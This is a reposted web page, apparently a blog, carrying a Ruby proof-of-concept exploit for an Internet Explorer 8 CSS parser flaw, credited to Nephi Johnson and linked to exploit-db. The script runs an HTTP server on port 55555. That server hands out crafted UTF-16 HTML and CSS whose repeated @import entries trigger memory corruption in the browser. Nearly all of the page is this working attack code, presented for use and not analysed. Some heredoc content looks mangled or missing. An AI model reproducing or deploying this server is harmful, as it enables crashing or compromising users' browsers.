Internet Explorer 8 CSS Parser Exploit Code

#!/usr/bin/env ruby 
  
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ 
# Author: Nephi Johnson (d0c_s4vage) 
  
require 'socket'
   
def http_send(sock, data, opts={}) 
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} 
    opts = defaults.merge(opts) 
      
    code = opts[:code] 
    message = opts[:message] 
    type = opts[:type] 
      
    to_send = "HTTP/1.1 #{code} #{message}\r\n" + 
              "Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" + 
              "Cache-Control: no-cache\r\n" + 
              "Content-Type: #{type}\r\n" + 
              "Pragma: no-cache\r\n" + 
              "Content-Length: #{data.length}\r\n\r\n" + 
              "#{data}"
    puts "[+] Sending:"
    to_send.split("\n").each do |line| 
        puts "    #{line}"
    end
    sock.write(to_send) rescue return false
    return true
end
   
def sock_read(sock, out_str, timeout=5) 
    begin
        if Kernel.select([sock],[],[],timeout) 
            out_str.replace(sock.recv(1024)) 
            puts "[+] Received:"
            out_str.split("\n").each do |line| 
                puts "    #{line}"
            end
        else
            sock.close 
            return false
        end
    rescue Exception => ex 
        return false
    end
end
   
def to_uni(str) 
    res = ""
    str.each_byte do |b| 
        res < < "\x00#{b.chr}"
    end
    res 
end

   
@css_name = "\x00s\x03s\x00s\x03s\x00s\x03s\x00s\x03s"
@html_name = "test.html"
placeholder = "a" * (@css_name.length/2) 
   
@html = < <-HTML
     
HTML
@html = "\xfe\xff" + to_uni(@html) 
@html.gsub!(to_uni(placeholder), @css_name) 
   
@css = < <-CSS
@import url("#{placeholder}"); 
@import url("#{placeholder}"); 
@import url("#{placeholder}"); 
@import url("#{placeholder}"); 
CSS
@css = "\xfe\xff" + to_uni(@css) 
@css.gsub!(to_uni(placeholder), @css_name) 
   
@index = <<-INDEX
#{@html_name} 
INDEX
   
TCPServer.open(55555) do |srv| 
    while true
        cli = srv.accept 
        req = ""
        html = ""
        css = ""
        index = ""
        next unless sock_read(cli, req, 5) 
        while req.length > 0
            if req =~ /GET/ 
                if req =~ /GET.*#{Regexp.escape(@html_name)}/ 
                    break unless http_send(cli, @html, :type=>"text/html") 
                elsif req =~ /GET.*index/ 
                    break unless http_send(cli, @index) 
                elsif req =~ /GET.*#{Regexp.escape(@css_name)}/ 
                    break unless http_send(cli, @css, :type=>"text/css") 
                else
                    break unless http_send(cli, @css, :type=>"text/css") 
                end
            elsif req =~ /QUIT/ 
                exit() 
            end
            req = ""
            next unless sock_read(cli, req, 5) 
        end
        cli.close rescue next
    end
end

Link:http://www.exploit-db.com/exploits/15746/

分享文章:

猜你喜欢:

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注